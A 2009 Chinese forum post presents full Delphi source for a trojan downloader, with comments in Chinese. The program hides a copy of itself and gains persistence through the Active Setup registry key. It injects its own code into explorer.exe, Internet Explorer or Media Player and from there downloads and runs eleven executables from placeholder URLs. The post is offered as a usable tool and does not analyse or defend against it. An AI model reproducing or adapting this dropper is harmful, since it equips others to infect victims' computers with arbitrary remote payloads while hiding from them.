

ActiveX启动下载者(delphi)

2009-6-17 10:58| 投稿: security

摘要: program InjectTheSelf; {$IMAGEBASE $13140000} usesWindows; var//动态加载shell32.dll中的ShellExecuteA函数S...
program InjectTheSelf; {$IMAGEBASE $13140000} usesWindows; var//动态加载shell32.dll中的ShellExecuteA函数ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;//动态加载Urlmon.dll中的UrlDownloadToFileA函数Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;hShell,hUrlmon: THandle; //插入IE需要用到的函数function GetIEAppPath:string;variekey: Hkey;iename: array [0..255] of char;vType,dLength :DWORD;beginvType := REG_SZ;RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);dLength := SizeOf(iename);if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 thenResult := ienameelseResult := '%programfiles%\Internet Explorer\IEXPLORE.EXE';RegCloseKey(iekey);end;//写注册表 用到的函数 为activeX启动准备function Skrivreg(key:Hkey; subkey,name,value:string):boolean;varregkey:hkey;beginresult := false;RegCreateKey(key,PChar(subkey),regkey);if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 thenresult := true;RegCloseKey(regkey); end; //插入media player用到的函数function GetwmAppPath:string;varwmkey: Hkey;iename: array [0..255] of char;vType,dLength :DWORD;begin vType := REG_SZ;RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);dLength := SizeOf(iename);if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 thenResult := ienameelseResult := '%programfiles%\Windows Media Player\wmplayer.EXE';RegCloseKey(wmkey);end; procedure Download; //下载过程beginLoadLibrary('kernel32.dll');LoadLibrary('user32.dll');hShell:=LoadLibrary('Shell32.dll');hUrlmon:=LoadLibrary('unlmon.dll');@ShellRun:= GetProcAddress(hShell,'ShellExecuteA');@Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');Downfile(nil,'http://x1xxxxxxxxxxxxxxxxxxxx                         ','C:\WINDOWS\Temp\system1.exe', 0, 
nil);ShellRun(0,'open','C:\WINDOWS\Temp\system1.exe',nil,nil,5); Downfile(nil,'http://x2xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system2.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system2.exe',nil,nil,5); Downfile(nil,'http://x3xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system3.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system3.exe',nil,nil,5); Downfile(nil,'http://x4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system4.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system4.exe',nil,nil,5); Downfile(nil,'http://x5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system5.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5); Downfile(nil,'http://x6xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system6.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system6.exe',nil,nil,5); Downfile(nil,'http://x7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system7.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5); Downfile(nil,'http://x8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system8.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system8.exe',nil,nil,5); Downfile(nil,'http://x9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system9.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system9.exe',nil,nil,5); Downfile(nil,'http://xAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemA.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\systemA.exe',nil,nil,5); Downfile(nil,'http://xBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemB.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\systemB.exe',nil,nil,5); ExitProcess(0);end; procedure Inject(ProcessHandle: longword; EntryPoint: pointer);varModule, NewModule: Pointer;Size, BytesWritten, TID: longword;begin//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址Module := Pointer(GetModuleHandle(nil));//得到内存映像的长度Size := 
PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;//在Exp进程的内存范围内分配一个足够长度的内存VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);//确定起始基址和内存映像基址的位置NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定上面各项数据后,这里开始进行操作WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);//建立远程线程,至此注入过程完成CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID); end; procedure RunInject(InjType:integer);varProcessHandle, PID: longword; beginif InjType=0 then //注入explorer.exebegin//获取Exp进程的PID码GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);endelseif InjType=3 then //注入 media playerbeginwinexec(PChar(GetwmAppPath),sw_hide);sleep(500);GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);endelse //注入iexplore.exebegin//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);winexec(PChar(GetIEAppPath),sw_hide);sleep(500);GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);end;//打开进程ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);Inject(ProcessHandle, @Download);//关闭对像CloseHandle(ProcessHandle);end; BEGIN CopyFile('C:\windows\system32\urlmon.dll','C:\windows\system32\unlmon.dll',true) ;copyfile(pchar(paramstr(0)),pchar('C:\Program Files\Internet Explorer\iede.exe'),true);SetFileAttributes( 'C:\Program Files\Internet Explorer\iede.exe',FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM );//设置文件系统隐藏属性//activex自启动skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{926A036A-158B-047A-E269-D148B0369C14}','StubPath','C:\Program Files\Internet Explorer\iede.exe');RunInject(0); //这里改为 :1 注入iexplore.exe 0 注入explorer.exe 3注人media playerend.





